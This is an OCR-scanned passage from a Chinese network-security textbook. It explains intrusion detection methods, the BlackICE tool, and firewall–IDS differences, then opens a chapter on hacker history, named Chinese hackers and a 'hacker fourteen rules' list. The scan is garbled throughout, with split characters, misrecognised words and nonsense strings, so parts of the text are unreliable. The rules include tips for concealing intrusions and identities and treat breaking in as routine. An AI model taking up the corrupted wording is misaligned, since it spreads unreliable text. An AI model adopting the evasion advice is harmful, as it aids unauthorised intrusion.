Venustech( 启 明星 辰 ) ,Internet Security System(ISS) 思科 、 赛 门 铁 克 等 公司 都 推出 了 自 
己 的 产品 。 


5.2.1. 入 侵 检 测 系 统 的 概念 


入 侵 检 测 系统 指 的 是 一 种 硬件 或 者 软件 系统 ,通过 实时 监视 系统 对 系统 资源 的 非 授 权 
使 用 能 够 做 出 及 时 的 判断 和 记录 ,一 旦 发 现 异常 情况 就 发 出 警报 。 

入 侵 检测 (Intrusion Detection) 是 对 入 侵 行为 的 检测 , 它 通过 收集 和 分 析 网 络 行为 、 安 
全 日 志 、 审 计数 据 、 其 他 网 络 上 可 以 获得 的 信息 以 及 计算 机 系统 中 若干 关键 点 的 信息 ,检查 
网 络 或 系统 中 是 否 存在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 入 侵 检测 作为 一 种 积极 主动 
的 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 ,在 网 络 系统 受到 危害 
之 前 拦截 和 响应 人 侵 , 因 此 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸门 ,在 不 影响 网 络 性 能 的 情 
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况 下 能 对 网 络 进行 监测 。 入 侵 检 测 通过 执行 以 下 任务 来 实现 : 监视 分析 用 户 及 系统 活动 
系统 构造 和 弱点 的 审计 ; 识别 反映 已 知 进攻 的 活动 模式 并 向 相关 人 十 报警 ; 异常 行为 模式 
的 统计 分 析 ; 评估 重要 系统 和 数据 文件 的 完整 性 ; 操作 系统 的 审计 跟踪 管理 ,并 识别 用 户 
违反 安全 策略 的 行为 。 

5.2.2 入 侵 检测 系统 功能 


入 侵 检测 系统 功能 主要 如 下 : 

1. 识别 黑客 常用 入 侵 与 攻击 手段 

入侵 检测 技术 通过 分 析 各 种 攻击 的 特征 ,可 以 全 面 快速 地 识别 探测 攻击 、 拒 绝 服务 攻 
击 , 缓 冲 区 溢出 攻击 、 电 子 邮 件 攻 击 、 浏 览 器 攻击 等 各 种 常用 攻击 手段 ,并 做 相应 的 防范 。 一 
般 来 说 ,黑客 在 进行 人 侵 的 第 一 步 探 测 、 收 集 网 络 及 系统 信息 时 ,就 会 被 IDS 捕获 ,向 管理 
员 发 出 警告 。 

2. 监控 网 络 异常 通信 

IDS 系统 会 对 网 络 中 不 正常 的 通信 连接 做 出 反应 ,保证 网 络 通信 的 合法 性 ,任何 不 符合 
网 络 安全 策略 的 网 络 数据 都 会 被 IDS 侦 测 到 并 警告 。 
3. 鉴别 对 系统 漏洞 及 后 门 的 利用 
IDS 系统 一 般 带 有 系统 漏洞 及 后 门 的 详细 信息 ,通过 对 网 络 数据 包 连 接 的 方式 .连接 端 
口 以 及 连接 中 特定 的 内 容 等 特征 分 析 , 可 以 有 效 地 发 现 网 络 通信 中 针对 系统 漏洞 进行 的 非 
法 行为 。 

4. 完善 网 络 安全 管理 

IDS 通过 对 攻击 或 人 侵 的 检测 及 反应 ,可 以 有 效 地 发 现 和 防止 大 部 分 的 网 络 犯罪 行为 ， 
给 网 络 安全 管理 提供 了 一 个 集中 ,方便 有效 的 工具 。 使 用 IDS 系统 的 监测 、 统 计 分 析 、 报 
表 功 能 ,可 以 进一步 完善 网 络 管理 。 


5.2.3. 入 侵 检 测 系 统 分 类 


1. 基于 主机 

一 般 主 要 使 用 操作 系统 的 审计 、 跟 踪 日 志 作 为 数据 源 , 某 些 也 会 主动 与 主机 系统 进行 交 
互 以 获得 不 存在 于 系统 日 志 中 的 信息 以 检测 人 侵 。 这 种 类 型 的 检测 系统 不 需要 额外 的 硬 
件 , 对 网 络 流量 不 敏感 ,效率 高 ,能 准确 定位 入侵 并 及 时 进行 反应 ,但 是 占用 主机 资源 ,依赖 
于 主机 的 可 靠 住 , 所 能 检测 的 攻击 类 型 受 限 , 不 能 检测 网 络 攻击 。 

2. 基于 网 络 

通过 被 动 地 监听 网 络 上 传输 的 原始 流量 ,对 获取 的 网 络 数据 进行 处 理 , 从 中 提取 有 用 的 
信息 ,再 通过 与 已 知 攻击 特征 相 匹配 或 与 正常 网 络 行为 原型 相 比较 来 识别 攻击 事件 。 此 类 
检测 系统 不 依赖 操作 系统 作为 检测 资源 ,可 应 用 于 不 同 的 操作 系统 平台 ; 配置 简单 ,不 需要 
任何 特殊 的 审计 和 登录 机 制 ; 可 检测 协议 攻击 ,特定 环境 的 攻击 等 多 种 攻击 。 但 它 只 能 监 
视 经 过 本 网 段 的 活动 ,无 法 得 到 主机 系统 的 实时 状态 ,精确 度 较 差 。 大 部 分 人 侵 检测 工具 都 
是 基于 网 络 的 和 人 侵 检 测 系统 。 
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3. 分 布 式 

这 种 入 侵 检测 系统 一 般 为 分 布 式 结构 ,由 多 个 部 件 组 成 ,在 关键 主机 上 采用 主机 入 侵 检 
测 ,在 网 络 关键 节点 上 采用 网 络 人 侵 检测 ,同时 分 析 来 自主 机 系统 的 审计 日 志和 来 自 网 络 的 
数据 流 , 判 断 被 保护 系统 是 否 受 到 攻击 。 


5.2.4 入 侵 检测 系统 的 方法 


入 侵 检 测 系统 的 方法 归纳 起 来 有 两 类 : 异常 检测 方法 和 误 用 检测 方法 。 

1. 异常 检测 方法 

异常 检测 (Anomaly Detection) 的 假设 是 入 侵 者 活动 异常 于 正常 主体 的 活动 。 建 立 主 
体 正常 活动 的 “活动 简 档 ”, 将 当前 主体 的 活动 状况 与 “活动 简 档 " 相 比 较 , 当 违反 其 统计 规律 
时 ,认为 该 活动 可 能 是 "人 侵 ” 行 为 。 异 常 检测 的 难题 在 于 如 何 建立 "活动 简 档 ” 以 及 如 何 设 
计 统 计算 法 ,从 而 不 把 正常 的 操作 作为 "和 人 侵 ? 或 忽略 真正 的 “入 侵 ” 行 为 。 异 常人 侵 检测 系 
统 中 常 采用 以 下 几 种 检测 方法 。 

基于 贝 叶 斯 推理 检测 法 : 通过 在 任何 给 定 的 时 刻 , 测 量变 量 值 ,推理 判断 系统 是 否 发 生 
ARF. 

基于 特征 选择 检测 法 : 从 一 组 量度 中 挑选 出 能 检测 入 侵 的 量度 ,用 它 来 对 入 侵 行为 进 
行 预 测 或 分 类 。 

基于 贝 叶 斯 网 络 检测 法 : 用 图 形 方式 表示 随机 变量 之 间 的 关系 。 通 过 指定 的 与 邻接 节 
点 相关 一 个 小 的 概率 集 来 计算 随机 变量 的 连接 概率 分 布 。 按 给 定 全 部 节点 组 合 ,所 有 根 节 
点 的 先 验 概率 和 非 根 节 点 概率 构成 这 个 集 。 贝 叶 斯 网 络 是 一 个 有 向 图 , 弧 表示 父 . 子 结 点 之 
间 的 依赖 关系 。 当 随机 变量 的 值 变 为 已 知 时 ,就 允许 将 它 吸收 为 证 据 , 为 其 他 的 剩余 随机 变 
量 条 件 值 判断 提供 计算 框架 。 

基于 模式 预测 的 检测 法 : 事件 序列 不 是 随机 发 生 的 而 是 遵循 某 种 可 辨别 的 模式 是 基于 
模式 预测 的 异常 检测 法 的 假设 条 件 , 其 特点 是 事件 序列 及 相互 联系 被 考虑 到 了 ,只 关心 少数 
相关 安全 事件 是 该 检测 法 的 最 大 优点 。 

基于 统计 的 异常 检测 法 : 根据 用 户 对 象 的 活动 为 每 个 用 户 都 建立 一 个 特征 轮廓 表 , 通 
过 对 当前 特征 与 以 前 已 经 建立 的 特征 进行 比较 ,来 判断 当前 行为 的 异常 性 。 用 户 特 征 轮廓 
表 要 根据 审计 记录 情况 不 断 更 新 ,其 保护 去 多 衡量 指标 ,这 些 指标 值 要 根据 经 验 值 或 一 段 时 
间 内 的 统计 而 得 到 。 

基于 机 器 学 习 检 测 法 : 根据 离散 数据 临时 序列 学 习 获得 网 络 、 系 统 和 个 体 的 行为 特征 ， 
并 提出 一 个 实例 学 习 法 IBL, IBL 是 基于 相似 度 ,该 方法 通过 新 的 序列 相似 度 计算 将 原始 数 
据 ( 如 离散 事件 流 和 无 序 的 记录 ) 转 化 成 可 度量 的 空间 。 然 后 ,应 用 IBL 学 习 技 术 和 一 种 新 
的 基于 序列 的 分 类 方法 ,发现 异常 类 型 事件 ,从 而 检测 入 侵 行为 。 其 中 ,成 员 分 类 的 概率 由 
阔 值 的 选取 来 决定 。 

数据 挖掘 检测 法 : 数据 挖掘 的 目的 是 要 从 海量 的 数据 中 提取 出 有 用 的 数据 信息 。 网 络 
中 会 有 大 量 的 审计 记录 存在 ,审计 记录 大 多 都 是 以 文件 形式 存放 的 。 如 果 靠 手工 方法 来 发 
现 记录 中 的 异常 现象 是 远 远 不 够 的 ,所 以 将 数据 挖掘 技术 应 用 于 入 侵 检 测 中 ,可 以 从 审计 数 
据 中 提取 有 用 的 知识 ,然后 用 这 些 知识 区 检测 异常 人 侵 和 已 知 的 入 侵 。 采 用 的 方法 有 KDD 
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算法 等 ,其 优点 是 善于 处 理 大 量 数据 与 数据 关联 分 析 , 但 是 实时 性 较 差 。 

基于 应 用 模式 的 异常 检测 法 : 该 方法 是 根据 服务 请 求 类 型 .服务 请 求 长 度 、 服 务 请 求 包 
大 小 分 布 计算 网 络 服务 的 异常 值 。 通 过 实时 计算 的 异常 值 和 所 训练 的 阔 值 比较 ,从 而 发 现 
异常 行为 。 

基于 文本 分 类 的 异常 检测 法 : 该 方法 是 将 系统 产生 的 进程 调用 集合 转换 为 文档 ”。 利 
用 开 邻 聚 类 文本 分 类 算法 ,计算 文档 的 相似 性 。 

2. 误 用 检测 方法 

误 用 入 侵 检测 系统 中 常用 的 检测 方法 有 以 下 几 种 。 

模式 匹配 法 : 常常 被 用 于 入 侵 检 测 技 术 中 , 它 是 通过 把 收集 到 的 信息 与 网 络 入 侵 和 系 
统 误 用 模式 数据 库 中 的 已 知 信息 进 行 比较 ,从 而 对 违背 安全 策略 的 行为 进行 发 现 。 模 式 匹 
配 法 可 以 显著 地 减少 系统 负担 ,有 和 较 高 的 检测 率 和 准确 率 。 

专家 系统 法 : 这 个 方法 的 思想 是 把 安全 专家 的 知识 表示 成 规则 知识 库 , 再 用 推理 算法 
检测 入 侵 。 主 要 是 针对 有 特征 的 入侵 行为 。 

基于 状态 转移 分 析 的 检测 法 : 该 方法 的 基本 思想 是 将 攻击 看 成 一 个 连续 的 、 分 步骤 的 
并 且 各 个 步骤 之 间 有 一 定 的 关联 的 过 程 。 在 网 络 中 发 生 和 人 侵 时 及 时 阻 断 入 侵 行为 ,防止 可 
能 还 会 进一步 发 生 的 类 似 攻击 行为 。 在 状态 转移 分 析 方 法 中 ,一 个 渗透 过 程 可 以 看 作 是 由 
攻击 者 做 出 的 一 系列 的 行为 而 导致 系统 从 某 个 初始 状态 变 为 最 终 某 个 被 危害 的 状态 的 
过 程 。 


5.2.5. 入 侵 检 测 系 统 的 步骤 


入 侵 检测 一 般 分 为 三 个 步骤 ,依次 为 信息 收集 ,数据 分 析 、` 响 应 (被 动 响应 和 主动 响应 ) 。 

1. 信息 收集 

信息 收集 包括 系统 、 网 络 .数据 及 用 户 活动 的 状态 和 行为 的 收集 。 入 侵 检测 利用 的 信息 
一 般 来 自 系统 日 志 、 目 录 以 及 文件 中 的 异常 改变 、 程 序 执行 中 的 异常 行为 及 物理 形式 的 人 侵 
信息 4 个 方面 。 

2. 数据 分 析 

数据 分 析 是 入 侵 检测 的 核心 。 它 首先 构建 分 析 器 ,把 收集 到 的 信息 经 过 预 处 理 ,建立 一 
个 行为 分 析 引 擎 或 模型 ,然后 向 模型 中 植 人 时 间 数 据 ,在 知识 库 中 保存 植 人 数据 的 模型 。 数 
据 分 析 一 般 通 过 模式 匹配 、 统 计 分 析 和 完整 性 分 析 3 种 手段 进行 ,前 两 种 方法 用 于 实时 入 侵 
检测 ,而 完整 性 分 析 则 用 于 事后 分 析 。 

3. 响应 

入 侵 检 测 系统 在 发 现 人 侵 后 会 及 时 作出 响应 ,包括 切断 网 络 连接 .记录 事件 和 报警 等 。 
响应 一 般 分 为 主动 响应 (阻止 攻击 或 影响 进而 改变 攻击 的 进程 ) 和 被 动 响应 (报告 和 记录 所 
检测 出 的 问题 ) 两 种 类 型 。 主 动 响应 由 用 户 驱 动 或 系统 本 身 自动 执行 ,可 对 入 侵 者 采取 行动 
(如 断 开 连 接 ) 修正 系统 环境 或 收集 有 用 信息 ; 被 动 响应 则 包括 告警 和 通知 、 简 单 网 络 管理 
协议 (SNMP) 陷阱 和 插件 等 。 另 外 ,还 可 以 按 策略 配置 响应 ,可 分 别 采取 立即 、 紧 急 、 适 时 、 
本 地 的 长 期 和 全 局 的 长 期 等 行动 。 
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5.2.6 入 侵 检 测 系 统 工具 BlackICE 


BlackICE Server Protection 软件 (以 下 简称 BlackICE) 是 由 ISS 安全 公司 出 品 的 一 款 
著名 的 人 侵 检测 系统 。 该 软件 在 1999 年 曾 获得 了 PC Magazine 的 技术 卓越 大 奖 。 专 家 对 
它 的 评语 是 :“ 对 于 没有 防火 墙 的 家 庭 用 户 来 说 , BlackICE 是 一 道 不 可 缺少 的 防线 ; 而 对 于 
企业 网 络 , 它 又 增加 了 一 层 保护 措施 一 一 它 并 不 是 要 取代 防火 墙 ,而 是 阻止 企图 穿 过 防火 墙 
WAZH o” BlackICE 集成 有 非常 强大 的 检测 和 分 析 引 擎 ,可 以 识别 多 种 人 侵 技巧 ,给 予 用 
户 全面 的 网 络 检测 以 及 系统 的 保护 。 而 且 该 软件 还 具有 灵敏 度 及 准确 率 高 ,稳定 性 出 色 , 系 
统 资源 占用 率 极 少 的 特点 。 

BlackICE 安装 后 以 后 台 服 务 的 方式 运行 ,前 端 有 一 个 控制 台 可 以 进行 各 种 报警 和 修改 
程序 的 配置 ,界面 很 简洁 。BlackICE 软件 最 具 特 色 的 地 方 是 内 置 了 应 用 层 的 入 侵 检 测 功 
能 ,并 且 能 够 与 自身 的 防火 墙 进行 联动 ,可 以 自动 阻 断 各 种 已 知 的 网 络 攻 击 行为 。 

BlackICE 具有 强大 的 网 络 攻 击 检测 能 力 , 可 以 说 大 部 分 的 非法 入侵 都 会 被 它 发 现 , 并 
采取 Critical, Serious, Suspicious 和 Information 这 4 种 级 别 报警 (分 别 用 红 、 橙 、 黄 和 绿 4 
种 颜色 标识 ,危险 程度 依次 降低 )。 同 样 ,BlackICE 对 外 来 访问 也 设 有 4 个 安全 级 别 ,分 别 
是 Trusting Cautious, Nervous 和 Paranoid, Paranoid 是 阻 断 所 有 的 未 授权 信息 , Nervous 
是 阻 断 大 部 分 的 未 授权 信息 ,Cautious 是 阻 断 部 分 的 未 授权 信息 ,而 软件 缺 省 设置 的 是 
Trusting 级 别 , 即 接受 所 有 信息 。 修 改 以 上 安全 级 别 , 可 以 通过 Tools 菜单 实现 ,如 图 5-6 
所 示 。 具 体 使 用 请 参考 第 9 章 实验 十 二 。 
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5-6 修改 BlackICE 的 安全 级 别 


5.2.7 防火 墙 和 入 侵 检测 系统 的 区 别 和 联系 


1. 防火 墙 和 入 侵 检测 系统 的 区 别 
(OD 概念 上 
防火 墙 是 设置 在 被 保护 网 络 ( 本 地 网 络 ) 和 外 部 网 络 (主要 是 Internet) 之 间 的 一 道 防御 
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系统 ,以 防止 发 生 不 可 预测 的 、 潜 在 的 破坏 性 的 侵入 。 它 可 以 通过 检测 、 限 制 .更 改 跨越 防火 
墙 的 数据 流 , 尽 可 能 地 对 外 部 屏蔽 内 部 的 信息 ,结构 和 运行 状态 ,以 此 来 保护 内 部 网 络 中 的 
信息 ,资源 等 不 受 外 部 网 络 中 非法 用 户 的 侵犯 。 

入 侵 检 测 系统 是 对 入 侵 行为 的 发 觉 ,通过 从 计算 机 网 络 或 计算 机 的 关键 点 收集 信息 并 
进行 分 析 , 从 中 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 

总 结 : 从 概念 上 我 们 可 以 看 出 防火 墙 是 针对 黑客 攻击 的 一 种 被 动 的 防御 ,IDS 则 是 主 
动 出 击 寻 找 潜在 的 攻击 者 ; 防火 墙 相当 于 一 个 机 构 的 门卫 ,受到 各 种 限制 和 区 域 的 影响 , 即 
凡是 防火 墙 允许 的 行为 都 是 合法 的 ,而 IDS 则 相当 于 巡逻 兵 , 不 受 范围 和 限制 的 约束 ,这 也 
造成 了 IDS 存在 误 报 和 漏 报 的 情况 。 

(2) 功能 上 

防火 墙 的 主要 功能 是 过 滤 不 安全 的 服务 和 非法 用 户 。 所 有 进出 内 部 网 络 的 信息 都 必须 
通过 防火 墙 ,防火 墙 成 为 一 个 检查 点 ,禁止 未 授权 的 用 户 访问 受 保护 的 网 络 。 

控制 对 特殊 站 点 的 访问 : 防火 墙 可 以 允许 受 保护 网 络 中 的 一 部 分 主机 被 外 部 网 访问 ， 
而 另 一 部 分 则 被 保护 起 来 。 

作为 网 络 安全 的 集中 监视 点 : 防火 墙 可 以 记录 所 有 通过 它 的 访问 ,并 提供 统计 数据 , 提 
供 预 警 和 审计 功能 。 

入 侵 检 测 系统 的 主要 任务 : 

。 监视 ,分 析 用 户 及 系统 活动 

。 对 异常 行为 模式 进行 统计 分 析 ,发 现 人 侵 行为 规律 

。 检查 系统 配置 的 正确 性 和 安全 漏洞 ,并 提示 管理 员 修 补漏 洞 

。 能 够 实时 对 检测 到 的 入 侵 行为 进行 响应 

。 评 估 系 统 关键 资源 和 数据 文件 的 完整 性 

。 操作 系统 的 审计 跟踪 管理 ,并 识别 用 户 违反 安全 策略 的 行为 

总 结 : 防火 墙 只 是 防御 为 主 ,通过 防火 墙 的 数据 便 不 再 进行 任何 操作 ,IDS 则 进行 实时 
的 检测 ,发现 人 侵 行为 即 可 做 出 反应 ,是 对 防火 墙 弱点 的 修补 ; 防火 墙 可 以 允许 内 部 的 一 些 
主机 被 外 部 访问 ,IDS 则 没有 这 些 功能 ,只 是 监视 和 分 析 用 户 和 系统 活动 。 

2. 防火 墙 和 入 侵 检测 系统 的 联系 

(QD IDS 是 继 防火 墙 之 后 的 又 一 道 防线 ,防火 墙 是 防御 ,IDS 是 主动 检测 ,两 者 相 结合 
力 地 保证 了 内 部 系统 的 安全 。 

(2) IDS 实时 检测 可 以 及 时 发 现 一 些 防火 墙 没 有 发 现 的 入 侵 行为 ,发现 人 侵 行为 的 规 
律 , 这 样 防火 墙 就 可 以 将 这 些 规律 加 入 规则 之 中 ,提高 防火 墙 的 防护 力度 。 


j 题 5 
一 、 填 空 是 


1. 常见 的 防火 墙 有 三 种 类 型 : 
2. 创建 一 个 防火 墙 系统 一 般 需 要 6 步 : 
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3. 常见 防火 墙 系统 一 般 按照 4 种 模型 构建 ; 


4. 人 侵 检测 的 三 个 基本 步骤 是 

5. 人 侵 检测 系统 分 为 基于 

二 、 简 答题 

1. 简 述 防火 墙 的 分 类 ,并 说 明 分 组 过 滤 防 火 墙 的 基本 原理 。 
2. 常见 防火 墙 模型 有 哪些 ? 比较 它们 的 优 缺 点 。 

3. 什么 是 入 侵 检测 系统 ? 简 述 入 侵 检 测 系统 目前 面临 的 挑战 。 
4. 简 述 入 侵 检测 常用 的 方法 。 


第 三 部 分 网络 安全 的 攻击 技术 


第 6 章 黑客 与 攻击 方法 


Wo 掌握 主动 扫描 和 被 动 扫 描 ,以 及 相应 工具 的 使 用 。 
E 了 解 黑客 的 定义 以 及 相关 的 事件 。 


6.1 黑客 概述 


6.1.1 黑客 的 起 源 


一 般 认 为 ,黑客 起 源 于 20 世纪 50 年 代 麻 省 理工 学 院 的 实验 室 中 ,他 们 精力 充沛 ,热衷 
于 解决 难题 。20 世纪 60,70 年 代 ，“ 黑 客 " 一 词 极 富 襄 义 , 用 于 指 代 那 些 独 立 思考 ,奉公 守法 
的 计算 机 迷 , 他 们 智力 超群 ,对 电脑 全 身心 投入 ,从 事 黑客 活动 意味 着 对 计算 机 最 大 潜力 地 
进行 智力 上 的 自由 探索 ,为 电脑 技术 的 发 展 做 出 了 巨大 贡献 。 正 是 这 些 黑客 ,倡导 了 一 场 个 
人 计算 机 革命 ,倡导 了 现行 的 计算 机 开放 式 体系 结构 ,打破 了 以 往 计算 机 技术 只 掌握 在 少数 
人 手 里 的 局 面 , 开 了 个 人 计算 机 的 先河 ,提出 了 “计算 机 为 人 民 所 用 ”的 观点 。 现 在 黑客 使 用 
的 侵入 计算 机 系统 的 基本 技巧 ,例如 破解 口令 (Password Cracking) , 开 天 窗 (Trapdoor) , 走 
Fil] (Backdoor) ,安放 特洛伊 木马 (Trojan Horse) 等 ,都 是 在 这 一 时 期 发 明 的 。 从 事 黑客 活 
动 的 经 历 , 成 为 后 来 许多 计算 机 业 巨 子 简历 上 不 可 或 缺 的 一 部 分 。 例 如 ,苹果 公司 创始 人 之 
一 乔布斯 就 是 一 个 典型 的 例子 。 

在 20 世纪 60 年 代 , 计 算 机 的 使 用 还 远 未 普及 ,还 没有 多 少 存储 重要 信息 的 数据 库 , 也 
谈 不 上 黑客 对 数据 的 非法 复制 等 问题 。 到 了 20 世纪 80,90 年代, 计算 机 越 来 越 重 要 ,大 型 
数据 库 也 越 来 越 多 ,同时 ,信息 越 来 越 集中 在 少数 人 的 手 里 。 黑 客 认为 ,信息 应 共享 而 不 应 
被 少数 人 所 垄断 ,于 是 将 注意 力 转 移 到 涉及 各 种 机 密 的 信息 数据 库 上 。 而 这 时 ,电脑 化 空间 
已 私有 化 ,成 为 个 人 拥有 的 财产 ,社会 不 能 再 对 黑客 行为 放任 不 管 ,而 必须 采取 行动 ,利用 法 
律 等 手段 来 进行 控制 。 黑 客 活 动 受到 了 空前 的 打击 。 

但 是 ,政府 和 公司 的 管理 者 现在 越 来 越 多 地 要 求 黑客 传授 给 他 们 有 关 电 脑 安 全 的 知识 。 
许多 公司 和 政府 机 构 已 经 邀请 黑客 为 他 们 检验 系统 的 安全 性 ,甚至 还 请 他 们 设计 新 的 保安 
规程 。 在 两 名 黑客 连续 发 现 网 景 公司 设计 的 信用 卡 购物 程序 的 缺陷 并 向 商界 发 出 公告 之 
后 ,网 景 修正 了 缺陷 并 宣布 举办 名 为 “网 景 缺陷 大 奖 赛 "的 竞赛 ,那些 发 现 和 找到 该 公司 
产品 中 安全 漏洞 的 黑客 可 获 1000 美元 奖金 。 无 疑 黑客 正在 对 电脑 防护 技术 的 发 展 作 出 
贡献 。 

显然 “黑客 "一 词 原 来 并 没有 丝毫 的 贬义 成 分 。 直 到 后 来 ,少数 怀 着 不 良 的 企图 ,利用 
非法 手段 获得 的 系统 访问 权 去 问 入 远程 计算 机 系统 、 破 坏 重要 数据 ,或 为 了 自己 的 私利 而 制 
造 麻烦 的 具有 恶意 行为 特征 的 人 , 慢 慢 焉 污 7 了 “黑客 ”的 名 声 ,“ 黑 客 ” 才 逐渐 演变 成 人 侵 者 、 
破坏 者 的 代名词 。 

到 了 今天 ,黑客 一 词 已 被 用 于 泛 指 那些 专门 利用 电脑 搞 破坏 或 恶作剧 的 家 伙 。 对 这 些 
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人 的 正确 英文 叫 法 是 Cracker, 有 人 翻译 成 “ 骇 客 ”, 就 是 “破解 者 ”的 意思 。 这 些 人 做 的 事情 
更 多 的 是 破解 商业 软件 、 恶 意 入 侵 别人 的 网 站 并 造成 损失 。 


6.1.2 黑客 的 定义 


CD 黑客 : 黑客 是 "Hacker” 的 音译 , 源 于 动词 Hack, 其 引申 意义 是 指 “ 干 了 一 件 非 常 漂 
亮 的 事 ”。 这 里 说 的 黑客 是 指 那 些 精 于 某 方面 技术 的 人 。 对 于 计算 机 而 言 ,黑客 就 是 精通 网 
络 、 系 统 、 外 设 以 及 软 硬 件 技术 的 人 。 黑 客 所 做 的 不 是 恶意 破坏 ,他 们 是 一 群 纵横 于 网 络 的 
技术 人 员 , 热 衷 于 科技 探索 、 计 算 机 科学 研究 。 在 黑客 圈 中 ,Hacker 一 词 无 疑 是 带 有 正面 的 
意义 ,例如 System Hacker 熟悉 系统 的 设计 与 维护 ,Password Hacker 精 于 找 出 使 用 者 的 密 
fij, Computer Hacker 则 是 通晓 计算 机 、 进 入 他 人 计算 机 操作 系统 的 高 手 , 早 期 在 美国 的 电 
脑 界 是 带 有 讲义 的 。 

(2) BR: 有 些 黑客 逾越 尺度 ,运用 自己 的 知识 去 做 出 有 损 他 人 权益 的 事情 ,就 称 这 种 
人 为 骇 客 (Cracker, 破 坏 者 ) 。 与 黑客 近 义 , 其 实 黑客 与 骇 客 本 质 上 都 是 相同 的 , 指 冯 和 人 计算 
机 系统 /软件 者 。 黑 客 和 ”* 骇 客 " 并 没有 一 个 十 分 明显 的 界限 ,但 随 着 两 者 含义 越 来 越 模糊 ， 
公众 对 两 者 含义 的 区 分 已 经 显得 不 那么 重要 了 。 

开放 源 代码 的 创始 人 “ 埃 里 克 …S. 雷 蒙 德 ”对 两 者 的 解释 是 :“ 黑 客 ”与 “ 骇 客 ” 是 分 属 两 
个 不 同 世界 的 族群 ,基本 差异 在 于 ,黑客 搞 建设 , 骇 客 搞 破坏 。 

O AR: 维护 国家 利益 代表 中 国人 民意 志 的 红 客 ,他 们 热爱 自己 的 祖国 .民族 .和 平 ， 
极力 维护 国家 安全 与 尊严 。 

(4) 蓝 客 : 信仰 自由 ,提倡 爱国 主义 的 黑客 们 ,用 自己 的 力量 来 维护 网 络 的 和 平 。 

中 国 黑客 代表 人 物 : 

Lion: 中 国 红 客 联盟 创始 人 ,国内 网 络 安全 专家 , 曾 多 次 反击 境外 。 

New4: 暗 组 (Dark Security Team) 论 坛 创始 人 之 一 ,擅长 逆向 工程 。 

8way: 暗 组 (Dark Security Team) 论 坛 创始 人 之 一 ,擅长 逆向 工程 。 

KANXUE: 看 雪 论 坛 创始 人 ,擅长 加 密 、 解 密 、 逆 向 工程 。 

King: 黑 盟 网 站 长 ,擅长 IP 流 、 渗 透 、 提 权 。 

小 皮 : 黑客 武林 论坛 站 长 EIE AR ERE, WEB 安全 、NET。 

MURK EMISSARY: China Murk Emissar 网 站 的 创始 人 ,擅长 渗透 .编程 。 

Æ Hf CGoodwelD : 绿色 兵团 创始 人 ,1999 年 化 刻 率领 黑客 组 织 “ 绿 色 兵 团 ” 成 立 上 海 绿 
盟 信 息 技 术 公 司 。 

葛 军 : 著名 远程 控制 软件 * 灰 合子 远 控 ”之 父 ,擅长 编程 。 

WD. 著名 渗透 入 侵 利器 “ 啊 D 注入 工具 ?的 研发 者 ,擅长 编程 .注入 。 

EN. 中 国 座 派 联 盟 创 始 人 之 一 ,擅长 入 侵 , 提 权 。 

明 小 子 : 著名 旁 注 软件 Domain 制作 者 ,黑客 动画 吧 创 始 人 ,擅长 编程 .注入 。 


6.1.3 黑客 守则 


任何 职业 都 有 相关 的 职业 道德 ,一 名 黑客 同样 有 职业 道德 ,一 些 守则 是 必须 遵守 的 ,不 
然 会 给 自己 招来 麻烦 。 归 纳 起 来 就 是 “黑客 十 四 条 守则 ”。 
D 不 要 恶意 破坏 任何 的 系统 ,这 样 做 只 会 给 你 带 来 麻烦 。 他 们 恪守 这 样 一 条 准则 : 
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“Never damage any system”( 永 不 破坏 任何 系统 ) 。 

(2). 不 要 破坏 别人 的 软件 和 资料 。 

(3) 不 要 修改 任何 系统 文件 ,如 果 是 因为 进入 系统 的 需要 而 修改 了 系统 文件 ,请 在 目的 
达到 后 将 它 改 回 原状 。 

(4) 不 要 轻易 地 将 你 要 黑 的 或 者 黑 过 的 站 点 告诉 你 不 信任 的 朋友 。 

O) 在 发 表 黑 客 文章 时 不 要 用 你 的 真实 名 字 。 

(6) 正在 入侵 的 时 候 ,不 要 随意 离开 你 的 电脑 。 

(7) 不 要 入 侵 或 破坏 政府 机 关 的 主机 。 

(8) 将 你 的 笔记 放 在 安全 的 地 方 。 

(9) 已 侵入 的 电脑 中 的 账号 不 得 清除 或 修改 。 

(10) 可 以 为 隐藏 自己 的 侵入 而 做 一 些 修 改 ,但 要 尽量 保持 原 系统 的 安全 性 ,不 能 因为 
得 到 系统 的 控制 权 而 将 门户 大 开 。 

(11) 不 要 做 一 些 无 聊 .单调 并 且 思 每 的 重复 性 工作 。 

(12) 做 真正 的 黑客 , 读 遍 所 有 有 关系 统 安全 或 系统 漏洞 的 书 。 

(13) 不 在 电话 中 谈论 关于 你 Hack 的 任何 事情 。 

(14) 不 将 你 已 破解 的 账号 分 享 给 你 的 朋友 。 
6.1.4 黑客 精神 

成 为 一 名 好 的 黑客 ,需要 具备 4 种 基本 素质 :“Free” 精 神 .探索 与 创新 精神 、 反 传统 精 
神 和 合作 精神 。 

1. Free( 自 由 、 免 费 ) 的 精神 

需要 在 网 络 上 和 本 国 以 及 国际 上 一 些 高 手 进 行 广泛 的 交流 ,并 有 一 种 奉献 精神 ,将 自己 
的 心得 和 编写 的 工具 和 其 他 黑客 共享 。 

2. 探索 与 创新 的 精神 

所 有 的 黑客 都 是 喜欢 探索 软件 程序 奥秘 的 人 。 他 们 探索 程序 与 系统 的 漏洞 ,在 发 现 问 
题 的 同时 会 提出 解决 问题 的 方法 。 

3. 反 传 统 的 精神 

找 出 系统 漏洞 ,并 策划 相关 的 手段 利用 该 漏洞 进行 攻击 ,这 是 黑客 永恒 的 工作 主题 ,而 
所 有 的 系统 在 没有 发 现 漏洞 之 前 ,都 号 称 是 安全 的 。 

4. 合作 的 精神 ( 写 免 费 的 软件 .帮忙 test 和 debug 免费 的 软件 .公布 有 用 的 资讯 .帮忙 

维持 一 些 简单 的 工作 ) 

一 次 成 功 的 入 侵 和 攻击 ,在 目前 的 形式 下 , 单 靠 一 个 人 的 力量 已 经 没有 办 法 完成 了 , 通 

常 需要 数 人 、 数 百人 的 通力 协作 才能 完成 任务 ,互联 网 提供 了 不 同 国家 黑客 交流 合作 的 


A 
T o 


6.1.5 代表 人 物 和 成 就 


1. Kevin Mitnick 
凯 文 。 米 特 尼克 (Kevin David Mitnick, 1964 年 美国 洛杉矶 出 生 ), 有 评论 称 他 为 世界 
